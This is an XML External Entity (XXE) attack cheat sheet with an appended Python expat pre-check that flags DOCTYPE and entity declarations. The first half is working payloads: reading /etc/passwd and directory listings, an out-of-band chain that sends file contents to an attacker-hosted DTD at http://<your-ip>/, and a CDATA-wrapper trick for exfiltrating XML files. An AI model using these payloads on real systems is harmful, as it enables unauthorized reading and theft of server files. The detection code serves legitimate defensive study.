XML External Entity (XXE)

Value Replacement

<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname "Replaced">
]>
<Contact>
  <lastName>&lastname;</lastName>
  <firstName>Tom</firstName>
</Contact>

Retrieving files

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///etc/passwd">
]>
<Contact>
  <lastName>&lastname;</lastName>
  <firstName>Tom</firstName>
</Contact>

Reading directory content

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///home/">
]>
<Contact>
  <lastName>&lastname;</lastName>
  <firstName>Tom</firstName>
</Contact>

Out-of-band exploitation

Our external DTD, served from http://<your-ip>/external.dtd:

<!ENTITY % content SYSTEM "file:///etc/passwd">
<!ENTITY % external "<!ENTITY &#37; exfil SYSTEM 'http://<your-ip>/out?%content;'>" >

Request:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE oob [
<!ENTITY % base SYSTEM "http://<your-ip>/external.dtd">
%base;
%external;
%exfil;
]>
<entity-engine-xml>
</entity-engine-xml>

CDATA Wrappers

When the retrieved file is itself XML, or contains characters such as < or &, expanding it directly into the document breaks parsing. Wrapping the content in a CDATA section avoids this. Because parameter entity references are not allowed inside entity values in the internal subset, the wrapper entity has to be declared in an external DTD.

Wrapper DTD, served from http://<your-ip>/wrapper.dtd:

<!ENTITY wrapper "%start;%file;%end;">

Payload:

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///etc/passwd" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://<your-ip>/wrapper.dtd" >
%dtd;
]>
<Contact>
  <lastName>&wrapper;</lastName>
  <firstName>Tom</firstName>
</Contact>
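Every payload on this page depends on a DOCTYPE with entity declarations, so a defender's simplest gate is to refuse such documents before they reach the application's parser. The following is an added example, not part of the original cheat sheet: a standard-library (expat) pre-check that reports DOCTYPE, entity declarations and external entity references, run against constructed samples shaped like the Value Replacement and Retrieving files payloads (the file URL is a placeholder, never fetched).

```python
import xml.parsers.expat as expat


def inspect_xml(xml_bytes: bytes) -> list:
    """Return DTD/entity findings; an empty list means the document uses
    none of the constructs the XXE payloads above rely on."""
    findings = []
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(f"DOCTYPE for root '{name}'")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter" if is_param else "general"
        source = f"SYSTEM {sysid!r}" if sysid else "internal value"
        findings.append(f"{kind} entity '{name}' from {source}")

    def on_external_ref(context, base, sysid, pubid):
        # Called when content references an external entity; returning 0
        # makes expat abort the parse instead of fetching the resource.
        findings.append(f"external entity reference to {sysid!r}")
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as exc:
        findings.append(f"parse aborted: {exc}")
    return findings


def is_safe(xml_bytes: bytes) -> bool:
    """Gate to apply before handing input to the real XML parser."""
    return not inspect_xml(xml_bytes)


# Constructed samples: a clean document and the two shapes used on this page.
SAFE_DOC = b"<Contact><lastName>Smith</lastName><firstName>Tom</firstName></Contact>"
INTERNAL_ENTITY_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY lastname "Replaced"> ]>
<Contact><lastName>&lastname;</lastName></Contact>"""
EXTERNAL_ENTITY_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY lastname SYSTEM "file:///placeholder/not/fetched"> ]>
<Contact><lastName>&lastname;</lastName></Contact>"""

if __name__ == "__main__":
    for label, doc in (("safe", SAFE_DOC), ("internal", INTERNAL_ENTITY_DOC),
                       ("external", EXTERNAL_ENTITY_DOC)):
        print(label, is_safe(doc), inspect_xml(doc))
```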